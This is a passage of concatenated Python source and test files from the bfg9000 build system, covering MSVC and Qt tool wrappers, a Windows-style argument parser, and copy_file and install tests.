return 'msvc'
@property
def family(self):
return 'native'
@property
def auto_link(self):
return True
@property
def can_dual_link(self):
return False
def linker(self, mode):
return self._linkers[mode]
class MsvcPackageResolver:
_lib_names = ['{}.lib']
def __init__(self, builder, env):
self.builder = builder
self.env = env
self.include_dirs = [i for i in uniques(chain(
self.builder.compiler.search_dirs(),
self.env.host_platform.include_dirs
)) if exists(i)]
self.lib_dirs = [i for i in uniques(chain(
self.builder.linker('executable').search_dirs(),
self.env.host_platform.lib_dirs
)) if exists(i)]
@property
def lang(self):
return self.builder.lang
# TODO: Remove headers/libs from arguments after 0.7 is released.
def resolve(self, name, submodules, version, kind, *, headers=None,
libs=None, system=True):
format = self.builder.object_format
usage = mopack.get_usage(self.env, name, submodules, self.include_dirs,
self.lib_dirs, self._lib_names)
# XXX: Add headers/libs here somehow? Add them into PkgConfigPackage
# directly?
return pkg_config.resolve(
self.env, name, submodules, version, usage['pcfiles'],
format=format, kind=kind, system=system, search_path=usage['path'],
extra_options=usage.get('extra_args', []),
generated=usage.get('generated', False)
)
```
#### File: bfg9000/tools/qt.py
```python
from itertools import chain
from . import builder
from .. import options as opts, safe_str, shell
from .common import Builder, choose_builder, SimpleBuildCommand
from ..file_types import HeaderFile, SourceFile
from ..iterutils import iterate
from ..languages import known_langs
from ..path import Path
from ..versioning import detect_version
# Set the source language to C++, since we want to be able to use the C++
# language definition to infer whether a file passed to `moc` is a source or
# header file based on its extension.
with known_langs.make('qtmoc', src_lang='c++') as x:
x.vars(compiler='MOC', flags='MOCFLAGS')
with known_langs.make('qrc') as x:
x.vars(compiler='RCC', flags='RCCFLAGS')
x.exts(source=['.qrc'])
with known_langs.make('qtui') as x:
x.vars(compiler='UIC', flags='UICFLAGS')
x.exts(source=['.ui'])
@builder('qtmoc')
def moc_builder(env):
return choose_builder(env, known_langs['qtmoc'], (MocBuilder,),
default_candidates=['moc'])
class MocBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
super().__init__(langinfo.name, *self._parse_brand(version_output))
name = langinfo.var('compiler').lower()
mocflags_name = langinfo.var('flags').lower()
mocflags = shell.split(env.getvar(langinfo.var('flags'), ''))
self.transpiler = MocCompiler(
self, env, command=(name, command, found),
flags=(mocflags_name, mocflags)
)
@staticmethod
def _parse_brand(version_output):
if 'moc' in version_output:
return 'qt', detect_version(version_output)
return 'unknown', None
@staticmethod
def check_command(env, command):
return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.devnull)
class MocCompiler(SimpleBuildCommand):
@property
def deps_flavor(self):
return None
def _call(self, cmd, input, output, flags=None):
return list(chain(
cmd, iterate(flags), [input, '-o', output]
))
def default_name(self, input, step):
if isinstance(input, SourceFile):
return input.path.stripext('.moc').suffix
base, leaf = input.path.stripext(
known_langs['c++'].default_ext('source')
).splitleaf()
return base.append('moc_' + leaf).suffix
def output_file(self, name, step):
return SourceFile(Path(name), 'c++')
def flags(self, options, global_options=None, output=None, mode='normal'):
flags = []
for i in options:
if isinstance(i, opts.include_dir):
flags.append('-I' + i.directory.path)
elif isinstance(i, opts.define):
if i.value:
flags.append('-D' + i.name + '=' + i.value)
else:
flags.append('-D' + i.name)
elif isinstance(i, opts.warning):
for j in i.value:
if j == opts.WarningValue.disable:
flags.append('--no-warnings')
else:
raise ValueError('unsupported warning level {!r}'
.format(j))
elif isinstance(i, safe_str.stringy_types):
flags.append(i)
else:
raise TypeError('unknown option type {!r}'.format(type(i)))
return flags
@builder('qrc')
def qrc_builder(env):
return choose_builder(env, known_langs['qrc'], (RccBuilder,),
default_candidates=['rcc'])
class RccBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
super().__init__(langinfo.name, *self._parse_brand(version_output))
name = langinfo.var('compiler').lower()
rccflags_name = langinfo.var('flags').lower()
rccflags = shell.split(env.getvar(langinfo.var('flags'), ''))
self.transpiler = RccCompiler(
self, env, command=(name, command, found),
flags=(rccflags_name, rccflags)
)
@staticmethod
def _parse_brand(version_output):
if 'rcc' in version_output:
return 'qt', detect_version(version_output)
return 'unknown', None
@staticmethod
def check_command(env, command):
return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.devnull)
class RccCompiler(SimpleBuildCommand):
@property
def deps_flavor(self):
return 'gcc'
def _call(self, cmd, input, output, deps=None, flags=None):
result = list(chain(cmd, iterate(flags), [input, '-o', output]))
if deps:
return self.env.tool('rccdep')(result, deps)
return result
def default_name(self, input, step):
return input.path.stripext(
known_langs['c++'].default_ext('source')
).suffix
def output_file(self, name, step):
return SourceFile(Path(name), 'c++')
def flags(self, options, global_options=None, output=None, mode='normal'):
flags = []
for i in options:
if isinstance(i, safe_str.stringy_types):
flags.append(i)
else:
raise TypeError('unknown option type {!r}'.format(type(i)))
return flags
@builder('qtui')
def qtui_builder(env):
return choose_builder(env, known_langs['qtui'], (UicBuilder,),
default_candidates=['uic'])
class UicBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
super().__init__(langinfo.name, *self._parse_brand(version_output))
name = langinfo.var('compiler').lower()
uicflags_name = langinfo.var('flags').lower()
uicflags = shell.split(env.getvar(langinfo.var('flags'), ''))
self.transpiler = UicCompiler(
self, env, command=(name, command, found),
flags=(uicflags_name, uicflags)
)
@staticmethod
def _parse_brand(version_output):
if 'uic' in version_output:
return 'qt', detect_version(version_output)
return 'unknown', None
@staticmethod
def check_command(env, command):
return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.devnull)
class UicCompiler(SimpleBuildCommand):
@property
def deps_flavor(self):
return None
def _call(self, cmd, input, output, flags=None):
return list(chain(
cmd, iterate(flags), [input, '-o', output]
))
def default_name(self, input, step):
base, leaf = input.path.stripext('.h').splitleaf()
return base.append('ui_' + leaf).suffix
def output_file(self, name, step):
return HeaderFile(Path(name), 'c++')
def flags(self, options, global_options=None, output=None, mode='normal'):
flags = []
for i in options:
if isinstance(i, safe_str.stringy_types):
flags.append(i)
else:
raise TypeError('unknown option type {!r}'.format(type(i)))
return flags
```
#### File: jimporter/bfg9000/mkdocs.py
```python
from verspec.python import Version
from bfg9000.app_version import version as version_str
def define_env(env):
version = Version(version_str)
tree = 'master' if version.is_prerelease else 'v{}'.format(version)
repo_src_url = '{}tree/{}/'.format(env.conf['repo_url'], tree)
env.variables.repo_src_url = repo_src_url
```
#### File: test/integration/test_executable.py
```python
import tarfile
from os.path import join as pjoin
from . import *
class TestExecutable(IntegrationTest):
def __init__(self, *args, **kwargs):
super().__init__(os.path.join(examples_dir, '01_executable'),
*args, **kwargs)
def test_build(self):
self.build(executable('simple'))
self.assertOutput([executable('simple')], 'hello, world!\n')
@skip_if_backend('msbuild')
def test_all(self):
self.build('all')
self.assertOutput([executable('simple')], 'hello, world!\n')
def test_default_and_clean(self):
def target_path(p, prefix=''):
return self.target_path(output_file(p), prefix)
self.build()
self.assertOutput([executable('simple')], 'hello, world!\n')
self.clean()
common = {'.bfg_environ', 'compile_commands.json'}
files = {
'ninja': [common | {'.ninja_deps', '.ninja_log', 'build.ninja'}],
'make': [common | {'Makefile', pjoin('simple.int', '.dir')}],
'msbuild': [common | {
'.bfg_uuid', 'simple.sln', pjoin('simple', 'simple.vcxproj'),
target_path('simple.Build.CppClean.log', prefix='simple'),
}, {
target_path('simple.exe.recipe', prefix='simple'),
target_path('simple.vcxproj.FileListAbsolute.txt',
prefix='simple'),
}],
}
self.assertDirectory('.', *files[self.backend])
@skip_if_backend('msbuild')
def test_dist(self):
dist = output_file('simple-1.0.tar.gz')
self.build('dist')
self.assertExists(dist)
with tarfile.open(self.target_path(dist)) as t:
self.assertEqual(set(t.getnames()), {
'simple-1.0/build.bfg',
'simple-1.0/simple.cpp',
})
```
#### File: test/integration/test_mopack.py
```python
import os
from . import *
@skip_if_backend('msbuild')
class TestMopack(IntegrationTest):
def __init__(self, *args, **kwargs):
super().__init__(os.path.join(examples_dir, '07_mopack'),
configure=False, install=True, *args, **kwargs)
def _test_build_install(self, to='world', extra_args=[]):
self.configure(extra_args=extra_args)
self.build()
env_vars = None
if env.target_platform.family == 'windows':
env_vars = {'PATH': os.path.abspath(
self.target_path(output_file('mopack/build/hello'))
) + os.pathsep + os.environ['PATH']}
self.assertOutput([executable('prog')], 'hello, {}!\n'.format(to),
extra_env=env_vars)
self.build('install')
os.chdir(self.srcdir)
cleandir(self.builddir)
extra = []
if env.target_platform.has_import_library:
extra = [os.path.join(self.libdir, import_library('hello').path)]
self.assertDirectory(self.installdir, [
os.path.join(self.includedir, 'hello.hpp'),
os.path.join(self.libdir, shared_library('hello').path),
os.path.join(self.libdir, 'pkgconfig', 'hello.pc'),
os.path.join(self.bindir, executable('prog').path),
] + extra)
self.assertOutput(
[os.path.join(self.bindir, executable('prog').path)],
'hello, {}!\n'.format(to)
)
def test_build_install_default(self):
self._test_build_install()
def test_build_install_mopack_override(self):
mopack_override = os.path.join(test_data_dir, 'mopack-override.yml')
self._test_build_install('bob', ['-p', mopack_override])
@skip_if('mingw-cross' not in test_features, 'skipping mingw cross test')
def test_mingw_windows(self):
self.configure(extra_args=['--toolchain', os.path.join(
test_data_dir, 'mingw-windows-toolchain.bfg'
)])
self.build()
output = self.assertPopen(['file', '-b', 'prog.exe'])
self.assertRegex(output, r"PE32")
```
#### File: unit/arguments/test_windows.py
```python
from .. import *
from bfg9000.arguments.windows import *
class TestWindowsArgParse(TestCase):
def test_empty(self):
parser = ArgumentParser()
self.assertEqual(parser.parse_known([]), ({}, []))
self.assertEqual(parser.parse_known(['extra']), ({}, ['extra']))
self.assertEqual(parser.parse_known(['/extra']), ({}, ['/extra']))
def test_short_bool(self):
parser = ArgumentParser()
parser.add('/a')
self.assertEqual(parser.parse_known([]), ({'a': None}, []))
self.assertEqual(parser.parse_known(['/a']), ({'a': True}, []))
self.assertEqual(parser.parse_known(['/a', '/a']), ({'a': True}, []))
parser = ArgumentParser()
parser.add('/a', '-a')
self.assertEqual(parser.parse_known([]), ({'a': None}, []))
self.assertEqual(parser.parse_known(['/a']), ({'a': True}, []))
self.assertEqual(parser.parse_known(['-a']), ({'a': True}, []))
def test_long_bool(self):
parser = ArgumentParser()
parser.add('/foo')
self.assertEqual(parser.parse_known([]), ({'foo': None}, []))
self.assertEqual(parser.parse_known(['/foo']), ({'foo': True}, []))
self.assertEqual(parser.parse_known(['/foo', '/foo']),
({'foo': True}, []))
parser = ArgumentParser()
parser.add('/foo', '-foo')
self.assertEqual(parser.parse_known([]), ({'foo': None}, []))
self.assertEqual(parser.parse_known(['/foo']), ({'foo': True}, []))
self.assertEqual(parser.parse_known(['-foo']), ({'foo': True}, []))
def test_short_str(self):
parser = ArgumentParser()
parser.add('/a', type=str)
self.assertEqual(parser.parse_known([]), ({'a': None}, []))
self.assertEqual(parser.parse_known(['/afoo']), ({'a': 'foo'}, []))
self.assertEqual(parser.parse_known(['/a', 'foo']), ({'a': 'foo'}, []))
self.assertEqual(parser.parse_known(['/afoo', '/a', 'bar']),
({'a': 'bar'}, []))
parser = ArgumentParser()
parser.add('/a', '-a', type=str)
self.assertEqual(parser.parse_known([]), ({'a': None}, []))
self.assertEqual(parser.parse_known(['/afoo']), ({'a': 'foo'}, []))
self.assertEqual(parser.parse_known(['-afoo']), ({'a': 'foo'}, []))
self.assertEqual(parser.parse_known(['/a', 'foo']), ({'a': 'foo'}, []))
self.assertEqual(parser.parse_known(['-a', 'foo']), ({'a': 'foo'}, []))
self.assertEqual(parser.parse_known(['/afoo', '-a', 'bar']),
({'a': 'bar'}, []))
def test_long_str(self):
parser = ArgumentParser()
parser.add('/foo', type=str)
self.assertEqual(parser.parse_known([]), ({'foo': None}, []))
self.assertEqual(parser.parse_known(['/foo:bar']),
({'foo': 'bar'}, []))
self.assertEqual(parser.parse_known(['/foo:bar', '/foo:baz']),
({'foo': 'baz'}, []))
parser = ArgumentParser()
parser.add('/foo', '-foo', type=str)
self.assertEqual(parser.parse_known([]), ({'foo': None}, []))
self.assertEqual(parser.parse_known(['/foo:bar']),
({'foo': 'bar'}, []))
self.assertEqual(parser.parse_known(['-foo:bar']),
({'foo': 'bar'}, []))
self.assertEqual(parser.parse_known(['/foo:bar', '-foo:baz']),
({'foo': 'baz'}, []))
def test_short_list(self):
parser = ArgumentParser()
parser.add('/a', type=list)
self.assertEqual(parser.parse_known([]), ({'a': []}, []))
self.assertEqual(parser.parse_known(['/afoo']), ({'a': ['foo']}, []))
self.assertEqual(parser.parse_known(['/a', 'foo']),
({'a': ['foo']}, []))
self.assertEqual(parser.parse_known(['/afoo', '/a', 'bar']),
({'a': ['foo', 'bar']}, []))
parser = ArgumentParser()
parser.add('/a', '-a', type=list)
self.assertEqual(parser.parse_known([]), ({'a': []}, []))
self.assertEqual(parser.parse_known(['/afoo']), ({'a': ['foo']}, []))
self.assertEqual(parser.parse_known(['-afoo']), ({'a': ['foo']}, []))
self.assertEqual(parser.parse_known(['/a', 'foo']),
({'a': ['foo']}, []))
self.assertEqual(parser.parse_known(['-a', 'foo']),
({'a': ['foo']}, []))
self.assertEqual(parser.parse_known(['/afoo', '-a', 'bar']),
({'a': ['foo', 'bar']}, []))
def test_long_list(self):
parser = ArgumentParser()
parser.add('/foo', type=list)
self.assertEqual(parser.parse_known([]), ({'foo': []}, []))
self.assertEqual(parser.parse_known(['/foo:bar']),
({'foo': ['bar']}, []))
self.assertEqual(parser.parse_known(['/foo:bar', '/foo:baz']),
({'foo': ['bar', 'baz']}, []))
parser = ArgumentParser()
parser.add('/foo', '-foo', type=list)
self.assertEqual(parser.parse_known([]), ({'foo': []}, []))
self.assertEqual(parser.parse_known(['/foo:bar']),
({'foo': ['bar']}, []))
self.assertEqual(parser.parse_known(['-foo:bar']),
({'foo': ['bar']}, []))
self.assertEqual(parser.parse_known(['/foo:bar', '-foo:baz']),
({'foo': ['bar', 'baz']}, []))
def test_short_dict(self):
parser = ArgumentParser()
warn = parser.add('/W', type=dict, dest='warn')
warn.add('1', '2', '3', '4', 'all', dest='level')
warn.add('X', type=bool, dest='error')
warn.add('X-', type=bool, dest='error', value=False)
warn.add('v', type=str, dest='version')
self.assertEqual(parser.parse_known([]), ({
'warn': {'level': None, 'error': None, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/W2']), ({
'warn': {'level': '2', 'error': None, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/W2', '/W4']), ({
'warn': {'level': '4', 'error': None, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/W2', '/WX']), ({
'warn': {'level': '2', 'error': True, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/Wv17']), ({
'warn': {'level': None, 'error': None, 'version': '17'}
}, []))
self.assertEqual(parser.parse_known(['/Wfoo']), ({
'warn': {'level': None, 'error': None, 'version': None}
}, ['/Wfoo']))
self.assertEqual(parser.parse_known(
['/WX', '/W2', '/WX-', '/Wall', '/Wv17', '/Wfoo']
), ({'warn': {'level': 'all', 'error': False, 'version': '17'}},
['/Wfoo']))
def test_long_dict(self):
parser = ArgumentParser()
warn = parser.add('/Warn', type=dict, dest='warn')
warn.add('1', '2', '3', '4', 'all', dest='level')
warn.add('X', type=bool, dest='error')
warn.add('X-', type=bool, dest='error', value=False)
warn.add('v', type=str, dest='version')
self.assertEqual(parser.parse_known([]), ({
'warn': {'level': None, 'error': None, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/Warn:2']), ({
'warn': {'level': '2', 'error': None, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/Warn:2', '/Warn:4']), ({
'warn': {'level': '4', 'error': None, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/Warn:2', '/Warn:X']), ({
'warn': {'level': '2', 'error': True, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/Warn:v17']), ({
'warn': {'level': None, 'error': None, 'version': '17'}
}, []))
self.assertEqual(parser.parse_known(['/Warn:foo']), ({
'warn': {'level': None, 'error': None, 'version': None}
}, ['/Warn:foo']))
self.assertEqual(parser.parse_known(
['/Warn:X', '/Warn:2', '/Warn:X-', '/Warn:all', '/Warn:v17',
'/Warn:foo']
), ({'warn': {'level': 'all', 'error': False, 'version': '17'}},
['/Warn:foo']))
def test_alias(self):
parser = ArgumentParser()
nologo = parser.add('/nologo')
warn = parser.add('/W', type=dict, dest='warn')
warn.add('0', '1', '2', '3', '4', 'all', dest='level')
parser.add('/N', type='alias', base=nologo)
parser.add('/w', type='alias', base=warn, value='0')
self.assertEqual(parser.parse_known([]),
({'nologo': None, 'warn': {'level': None}}, []))
self.assertEqual(parser.parse_known(['/N']),
({'nologo': True, 'warn': {'level': None}}, []))
self.assertEqual(parser.parse_known(['/w']),
({'nologo': None, 'warn': {'level': '0'}}, []))
def test_unnamed(self):
parser = ArgumentParser()
parser.add('/a')
parser.add_unnamed('libs')
self.assertEqual(parser.parse_known([]),
({'a': None, 'libs': []}, []))
self.assertEqual(parser.parse_known(['foo']),
({'a': None, 'libs': ['foo']}, []))
self.assertEqual(parser.parse_known(['foo', '/a', 'bar']),
({'a': True, 'libs': ['foo', 'bar']}, []))
def test_case(self):
parser = ArgumentParser()
parser.add('/s')
parser.add('/long')
self.assertEqual(parser.parse_known(['/s', '/long']),
({'s': True, 'long': True}, []))
self.assertEqual(parser.parse_known(['/S', '/LONG']),
({'s': None, 'long': None}, ['/S', '/LONG']))
parser = ArgumentParser(case_sensitive=False)
parser.add('/s')
parser.add('/long')
self.assertEqual(parser.parse_known(['/s', '/long']),
({'s': True, 'long': True}, []))
self.assertEqual(parser.parse_known(['/S', '/LONG']),
({'s': None, 'long': True}, ['/S']))
def test_collision(self):
parser = ArgumentParser()
parser.add('/a', '/longa')
with self.assertRaises(ValueError):
parser.add('/a')
with self.assertRaises(ValueError):
parser.add('/abc')
with self.assertRaises(ValueError):
parser.add('/longa')
def test_invalid_prefix_char(self):
parser = ArgumentParser()
with self.assertRaises(ValueError):
parser.add('warn')
def test_unexpected_value(self):
parser = ArgumentParser()
parser.add('/a', '/longa')
with self.assertRaises(ValueError):
parser.parse_known(['/afoo'])
with self.assertRaises(ValueError):
parser.parse_known(['/longa:foo'])
def test_expected_value(self):
parser = ArgumentParser()
parser.add('/a', '/longa', type=str)
parser.add('/list', type=list)
warn = parser.add('/warn', type=dict, dest='warn')
warn.add('1', '2', '3', '4', 'all', dest='level')
with self.assertRaises(ValueError):
parser.parse_known(['/a'])
with self.assertRaises(ValueError):
parser.parse_known(['/longa'])
with self.assertRaises(ValueError):
parser.parse_known(['/list'])
with self.assertRaises(ValueError):
parser.parse_known(['/warn'])
def test_invalid_dict_child(self):
parser = ArgumentParser()
warn = parser.add('/W', type=dict, dest='warn')
with self.assertRaises(ValueError):
warn.add('version', type=str)
def test_unexpected_dict_value(self):
parser = ArgumentParser()
warn = parser.add('/W', type=dict, dest='warn', strict=True)
warn.add('1', '2', '3', '4', 'all', dest='level')
with self.assertRaises(ValueError):
parser.parse_known(['/WX'])
def test_invalid_alias_base(self):
parser = ArgumentParser()
warn = parser.add('/W')
with self.assertRaises(TypeError):
parser.add('/w', type='alias', base=warn, value='0')
```
#### File: unit/builtins/common.py
```python
from .. import AttrDict, make_env, TestCase # noqa
from bfg9000 import file_types
from bfg9000.builtins import builtin
from bfg9000.build_inputs import BuildInputs
from bfg9000.path import Path, Root
class AlwaysEqual:
def __eq__(self, rhs):
return True
class FileTest(TestCase):
def assertSameFile(self, a, b, exclude=set(), seen=None):
if seen is None:
seen = set()
seen.add(id(a))
self.assertEqual(type(a), type(b))
keys = ((set(a.__dict__.keys()) | set(b.__dict__.keys())) -
exclude - {'creator', 'post_install'})
for i in keys:
ai, bi = getattr(a, i, None), getattr(b, i, None)
if ( isinstance(ai, file_types.Node) and
isinstance(bi, file_types.Node) ):
if not id(ai) in seen:
self.assertSameFile(ai, bi, exclude, seen)
else:
self.assertEqual(
ai, bi, '{!r}: {!r} != {!r}'.format(i, ai, bi)
)
class BuiltinTest(FileTest):
clear_variables = False
def setUp(self):
self.env = make_env()
self.build, self.context = self._make_context(self.env)
self.bfgfile = file_types.File(self.build.bfgpath)
def _make_context(self, env):
build = BuildInputs(env, Path('build.bfg', Root.srcdir))
context = builtin.BuildContext(env, build, None)
context.path_stack.append(
builtin.BuildContext.PathEntry(build.bfgpath)
)
return build, context
```
#### File: unit/builtins/test_copy_file.py
```python
from unittest import mock
from .common import AlwaysEqual, BuiltinTest
from bfg9000 import file_types
from bfg9000.builtins import copy_file as _copy_file # noqa
from bfg9000.path import Path, Root
class TestCopyFile(BuiltinTest):
def test_make_simple(self):
expected = file_types.File(Path('file.txt'))
result = self.context['copy_file'](file='file.txt')
self.assertSameFile(result, expected)
result = self.context['copy_file']('file.txt', 'src.txt')
self.assertSameFile(result, expected)
result = self.context['copy_file']('file.txt')
self.assertSameFile(result, expected)
src = self.context['generic_file']('file.txt')
result = self.context['copy_file'](src)
self.assertSameFile(result, expected)
def test_make_no_name_or_file(self):
self.assertRaises(TypeError, self.context['copy_file'])
def test_make_directory(self):
expected = file_types.File(Path('dir/file.txt'))
copy_file = self.context['copy_file']
result = copy_file('file.txt', directory='dir')
self.assertSameFile(result, expected)
src = self.context['generic_file']('file.txt')
result = copy_file(src, directory='dir')
self.assertSameFile(result, expected)
result = copy_file('file.txt', directory='dir/')
self.assertSameFile(result, expected)
result = copy_file('file.txt', directory=Path('dir'))
self.assertSameFile(result, expected)
result = copy_file('dir1/file.txt', directory='dir2')
self.assertSameFile(result,
file_types.File(Path('dir2/dir1/file.txt')))
result = copy_file('copied.txt', 'file.txt', directory='dir')
self.assertSameFile(result, file_types.File(Path('copied.txt')))
self.assertRaises(ValueError, copy_file, file='file.txt',
directory=Path('dir', Root.srcdir))
def test_make_submodule(self):
with self.context.push_path(Path('dir/build.bfg', Root.srcdir)):
copy_file = self.context['copy_file']
File = file_types.File
result = copy_file(file='file.txt')
self.assertSameFile(result, File(Path('dir/file.txt')))
result = copy_file(file='sub/file.txt')
self.assertSameFile(result, File(Path('dir/sub/file.txt')))
result = copy_file(file='../file.txt')
self.assertSameFile(result, File(Path('file.txt')))
result = copy_file('copied.txt', 'file.txt')
self.assertSameFile(result, File(Path('dir/copied.txt')))
result = copy_file('../copied.txt', 'file.txt')
self.assertSameFile(result, File(Path('copied.txt')))
result = copy_file(file='file.txt', directory='sub')
self.assertSameFile(result, File(Path('dir/sub/file.txt')))
result = copy_file(file='foo/file.txt', directory='sub')
self.assertSameFile(result, File(Path('dir/sub/foo/file.txt')))
result = copy_file(file='../file.txt', directory='sub')
self.assertSameFile(result, File(Path('dir/sub/PAR/file.txt')))
result = copy_file(file='file.txt', directory=Path('dir2'))
self.assertSameFile(result, File(Path('dir2/dir/file.txt')))
result = copy_file(file='sub/file.txt', directory=Path('dir2'))
self.assertSameFile(result, File(Path('dir2/dir/sub/file.txt')))
result = copy_file(file='../file.txt', directory=Path('dir2'))
self.assertSameFile(result, File(Path('dir2/file.txt')))
result = copy_file(file='file.txt', directory=Path('dir'))
self.assertSameFile(result, File(Path('dir/dir/file.txt')))
result = copy_file(file='sub/file.txt', directory=Path('dir'))
self.assertSameFile(result, File(Path('dir/dir/sub/file.txt')))
result = copy_file(file='../file.txt', directory=Path('dir'))
self.assertSameFile(result, File(Path('dir/file.txt')))
def test_extra_deps(self):
dep = self.context['generic_file']('dep.txt')
expected = file_types.File(Path('file.txt'))
result = self.context['copy_file'](file='file.txt', extra_deps=[dep])
self.assertSameFile(result, expected)
self.assertEqual(result.creator.extra_deps, [dep])
def test_invalid_mode(self):
self.assertRaises(ValueError, self.context['copy_file'],
file='file.txt', mode='unknown')
def test_description(self):
result = self.context['copy_file'](
file='file.txt', description='my description'
)
self.assertEqual(result.creator.description, 'my description')
class TestCopyFiles(BuiltinTest):
def make_file_list(self, prefix=''):
files = [file_types.File(Path(i, Root.builddir))
for i in [prefix + 'file1', prefix + 'file2']]
src_files = [file_types.File(Path(i, Root.srcdir))
for i in [prefix + 'file1', prefix + 'file2']]
file_list = self.context['copy_files'](src_files)
return file_list, files, src_files
def test_initialize(self):
file_list, files, src_files = self.make_file_list()
self.assertEqual(list(file_list), files)
def test_getitem_index(self):
file_list, files, src_files = self.make_file_list()
self.assertEqual(file_list[0], files[0])
def test_getitem_string(self):
file_list, files, src_files = self.make_file_list()
self.assertEqual(file_list['file1'], files[0])
def test_getitem_string_submodule(self):
file_list, files, src_files = self.make_file_list('dir/')
self.assertEqual(file_list['dir/file1'], files[0])
with self.context.push_path(Path('dir/build.bfg', Root.srcdir)):
self.assertEqual(file_list['file1'], files[0])
def test_getitem_path(self):
file_list, files, src_files = self.make_file_list()
self.assertEqual(file_list[src_files[0].path], files[0])
def test_getitem_file(self):
file_list, files, src_files = self.make_file_list()
self.assertEqual(file_list[src_files[0]], files[0])
def test_getitem_not_found(self):
file_list, files, src_files = self.make_file_list()
self.assertRaises(IndexError, lambda: file_list[2])
self.assertRaises(IndexError, lambda: file_list['file3'])
self.assertRaises(IndexError, lambda: file_list[Path(
'file3', Root.srcdir
)])
class TestManPage(BuiltinTest):
def test_identity(self):
expected = file_types.ManPage(Path('myprogram.1', Root.srcdir), '1')
self.assertIs(self.context['man_page'](expected, compress=False),
expected)
def test_compress(self):
expected = file_types.ManPage(Path('myprogram.1.gz'), '1')
result = self.context['man_page']('myprogram.1', compress=True)
self.assertSameFile(result, expected)
man_page = file_types.ManPage(Path('myprogram.1', Root.srcdir), '1')
result = self.context['man_page'](man_page, compress=True)
self.assertSameFile(result, expected)
expected = file_types.ManPage(Path('myprogram.1s.gz'), '1')
result = self.context['man_page']('myprogram.1s', compress=True)
self.assertSameFile(result, expected)
expected = file_types.ManPage(Path('myprogram.1.gz'), '2')
result = self.context['man_page']('myprogram.1', level='2',
compress=True)
self.assertSameFile(result, expected)
def test_no_compress(self):
expected = file_types.ManPage(Path('myprogram.1', Root.srcdir), '1')
result = self.context['man_page']('myprogram.1', compress=False)
self.assertSameFile(result, expected)
expected = file_types.ManPage(Path('myprogram.1s', Root.srcdir), '1')
result = self.context['man_page']('myprogram.1s', compress=False)
self.assertSameFile(result, expected)
expected = file_types.ManPage(Path('myprogram.1', Root.srcdir), '2')
result = self.context['man_page']('myprogram.1', level='2',
compress=False)
self.assertSameFile(result, expected)
def test_auto_compress_enabled(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.env.tool('gzip')
expected = file_types.ManPage(Path('myprogram.1.gz'), '1')
result = self.context['man_page']('myprogram.1')
self.assertSameFile(result, expected)
def test_auto_compress_disabled(self):
with mock.patch('bfg9000.shell.which', side_effect=OSError('bad')), \
mock.patch('warnings.warn'):
self.env.tool('gzip')
expected = file_types.ManPage(Path('myprogram.1', Root.srcdir), '1')
result = self.context['man_page']('myprogram.1')
self.assertSameFile(result, expected)
def test_invalid(self):
with self.assertRaises(ValueError):
self.context['man_page']('myprogram.foo')
man_page = file_types.ManPage(Path('myprogram.1', Root.srcdir), '1')
with self.assertRaises(TypeError):
self.context['man_page'](man_page, level='2')
class TestMakeBackend(BuiltinTest):
def test_simple(self):
makefile = mock.Mock()
src = self.context['generic_file']('file.txt')
result = self.context['copy_file'](file=src)
_copy_file.make_copy_file(result.creator, self.build, makefile,
self.env)
makefile.rule.assert_called_once_with(
target=[result], deps=[src], order_only=[], recipe=AlwaysEqual()
)
def test_dir_sentinel(self):
makefile = mock.Mock()
src = self.context['generic_file']('dir/file.txt')
result = self.context['copy_file'](file=src)
_copy_file.make_copy_file(result.creator, self.build, makefile,
self.env)
makefile.rule.assert_called_once_with(
target=[result], deps=[src], order_only=[Path('dir/.dir')],
recipe=AlwaysEqual()
)
def test_extra_deps(self):
makefile = mock.Mock()
dep = self.context['generic_file']('dep.txt')
src = self.context['generic_file']('file.txt')
result = self.context['copy_file'](file=src, extra_deps=dep)
_copy_file.make_copy_file(result.creator, self.build, makefile,
self.env)
makefile.rule.assert_called_once_with(
target=[result], deps=[src, dep], order_only=[],
recipe=AlwaysEqual()
)
class TestNinjaBackend(BuiltinTest):
def test_simple(self):
ninjafile = mock.Mock()
src = self.context['generic_file']('file.txt')
result = self.context['copy_file'](file=src)
_copy_file.ninja_copy_file(result.creator, self.build, ninjafile,
self.env)
ninjafile.build.assert_called_once_with(
output=[result], rule='cp', inputs=src, implicit=[],
variables={}
)
def test_extra_deps(self):
ninjafile = mock.Mock()
dep = self.context['generic_file']('dep.txt')
src = self.context['generic_file']('file.txt')
result = self.context['copy_file'](file=src, extra_deps=dep)
_copy_file.ninja_copy_file(result.creator, self.build, ninjafile,
self.env)
ninjafile.build.assert_called_once_with(
output=[result], rule='cp', inputs=src, implicit=[dep],
variables={}
)
```
#### File: unit/tools/test_doppel.py
```python
from . import *
from bfg9000.tools.doppel import Doppel
class TestDoppel(ToolTestCase):
tool_type = Doppel
def test_env(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.assertIsInstance(self.env.tool('doppel'), Doppel)
def test_kind_args(self):
self.assertEqual(type(self.tool.kind_args('program')), list)
self.assertEqual(type(self.tool.kind_args('data')), list)
self.assertRaises(ValueError, self.tool.kind_args, 'unknown')
def test_call_onto(self):
self.assertEqual(self.tool('onto', 'src', 'dst'),
[self.tool, '-p', 'src', 'dst'])
def test_call_into(self):
self.assertEqual(self.tool('into', 'src', 'dst'),
[self.tool, '-ipN', 'src', 'dst'])
self.assertEqual(self.tool('into', ['src1', 'src2'], 'dst'),
[self.tool, '-ipN', 'src1', 'src2', 'dst'])
self.assertEqual(self.tool('into', 'src', 'dst', directory='dir'),
[self.tool, '-ipN', '-C', 'dir', 'src', 'dst'])
def test_call_archive(self):
self.assertEqual(self.tool('archive', 'src', 'dst', format='tar'),
[self.tool, '-ipN', '-f', 'tar', 'src', 'dst'])
self.assertEqual(
